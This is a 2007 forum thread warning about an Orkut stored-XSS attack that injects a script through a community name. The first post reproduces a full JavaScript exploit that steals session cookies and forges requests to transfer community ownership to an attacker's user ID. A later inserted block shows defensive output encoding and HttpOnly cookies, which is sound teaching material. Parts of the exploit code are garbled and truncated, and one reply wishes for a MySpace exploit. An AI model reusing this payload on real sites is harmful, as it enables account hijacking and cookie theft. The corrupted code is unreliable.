
Orkut cookie exploit, anyone can steal your Orkut community ownership, BEWARE!!!

Posted: Sun Mar 11, 2007 7:11 am
by stephin
There is yet another exploit on Orkut (the Google affiliated Social Networking Service), and this exploit can easily be made use of to obtain ownership of someone else's community, with just a **** on a community link. Name the community with:
< script scr="...URL...">

where URL points to the location where the below JavaScript is stored. Once someone **** on a community having such a name, the script at that URL gets executed, and their community ownership is transferred to the person with the user ID **** (see below), which is the 20-digit User ID of the person to whom your ownership gets transferred. I just lost ownership to my "C/C++ Programmers India" community. So, BEWARE of this exploit and NEVER EVER **** on any community or profile with a name such as:
< script scr="...URL...">

The JavaScript exploit code is as below: (comments are in Portuguese, which I don't know a thing about, and neither am I a JavaScript expert, so I let you understand this script by yourself).

var uid="****"; ////window.alert('injetado');function createXMLHttpRequest(){try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}try{ return new XMLHttpRequest(); }catch(e){}return null;}function getCookies(){subject="Orkut Cookie Exploit";dcookie=****.cookie;if(dcookie.indexOf('state') > -1){mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nExploit escrito por Rodrigo Lacerda";}else{mensagem = "Este usuário usa Internet Explorer e a função de pegar cookies falhou, verifique se ele enviou alguma comundiade\n\nOrkut Community Transfer & Cookie Stealer Exploit\n";}check_scraps();};getCookies();function velocity_transfer(){send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";var xml= createXMLHttpRequest();xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,true);xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xml.send(send);xml.onreadystatechange=function(){if(xml.readyState==4){var
xmlrtr=xml.responseText;x++;if(x -1 ? cont.indexOf(' -1 ? cont.indexOf(' -1){SIG=xmlr1.match(/signature. value="(.+)"/i)[1];POST=xmlr1.match(/name="POST_TOKEN" value="([^"]+)/i)[1];send_message();}else{check_scraps();}};};xml.send(null);};// Exploit escrito por Rodrigo Lacerda
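Added example, not part of the original post and not Orkut's code: the script above only runs because a stored community name is written into the page unencoded, and it can only read the cookie because the cookie is visible to `document.cookie`. The sketch below shows the rendering bug beside an output-encoded version, plus a session cookie marked `HttpOnly`; the function names, the `/Community.aspx` path and the sample values are assumptions made for illustration.

```javascript
// Added example: all helper names and the /Community.aspx path are hypothetical.

// Encode the five characters that are significant in HTML text and attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: the stored name is concatenated into markup as-is,
// so a name that is a script tag becomes a live element in the visitor's page.
function renderCommunityLinkUnsafe(id, name) {
  return '<a href="/Community.aspx?cmm=' + id + '">' + name + '</a>';
}

// Hardened pattern: the id must be numeric and the name is encoded on output,
// so the browser displays the name as text instead of parsing it as markup.
function renderCommunityLink(id, name) {
  if (!/^\d+$/.test(String(id))) {
    throw new TypeError('community id must be numeric');
  }
  return '<a href="/Community.aspx?cmm=' + id + '">' + escapeHtml(name) + '</a>';
}

// HttpOnly hides the cookie from document.cookie; Secure and SameSite limit
// where the browser will send it.
function sessionCookie(name, value) {
  return name + '=' + encodeURIComponent(value) + '; Path=/; Secure; HttpOnly; SameSite=Lax';
}

// Constructed sample input: a community name shaped like the one in the post.
const sampleName = '<script src="https://example.invalid/x.js"></script>';

console.log(renderCommunityLinkUnsafe(12345, sampleName)); // tag survives intact
console.log(renderCommunityLink(12345, sampleName));       // tag rendered as text
console.log(sessionCookie('state', 'constructed-value'));
```

Output encoding is the fix that matters here: the script runs in the site's own origin and reads `POST_TOKEN` and `signature` from the page, so request tokens alone do not stop it.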

Posted: Sat Mar 24, 2007 4:26 am
by anupat3l
Exploits ... MMMMMMMM

I wish someone could find an exploit to MySpace as I totally hate it... it really sucks, don't y'all think??

Posted: Wed Sep 26, 2007 1:56 am
by Gyanu
That was the crazy idea. haaaaaaaaaaaaaaaaaaa!